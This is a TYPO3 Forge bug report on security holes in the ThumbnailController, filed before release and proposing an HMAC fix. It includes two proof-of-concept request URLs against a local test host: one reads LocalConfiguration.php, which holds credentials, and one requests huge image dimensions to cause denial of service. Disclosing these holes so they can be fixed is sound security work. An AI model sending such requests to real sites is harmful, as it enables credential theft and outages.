Bug #85875: Issues in ThumbnailController - TYPO3 Core - TYPO3 Forge

Bug #85875

Updated by Oliver Hader over 5 years ago

* information disclosure (fileIdentifier can be arbitrary, supports fallback zero-storage) 
 * denial of service (dimensions, basically whole configuration can be arbitrary) 

 Introduced in https://review.typo3.org/#/c/56765/ - not released yet to 9.4.0 nor 8.7.19 

 Solution: Add HMAC to all HTTP request parameters. 

 PoC 

 h2. Information Disclosure 

 <pre> 
 http://ip9.local/typo3/index.php?route=%2Fthumbnails&token=f956bed9f5fa218860ef00491b37d9ede93b7731 
 &fileIdentifier=typo3conf/LocalConfiguration.php&processingInstructions%5Bwidth%5D=64 
 &processingInstructions%5Bheight%5D=64c 
 &processingInstructions%5Bcrop%5D= 
 </pre> 

 h2. Denial of Service 

 <pre> 
 http://ip9.local/typo3/index.php?route=%2Fthumbnails&token=f956bed9f5fa218860ef00491b37d9ede93b7731 
 &fileIdentifier=1%3A%2Fuser_upload%2Fafter_01.png 
 &processingInstructions%5Bwidth%5D=1000000 
 &processingInstructions%5Bheight%5D=1000000c 
 &processingInstructions%5Bcrop%5D= 
 </pre>

Back

Project

General

Profile

TYPO3 Core

Bug #85875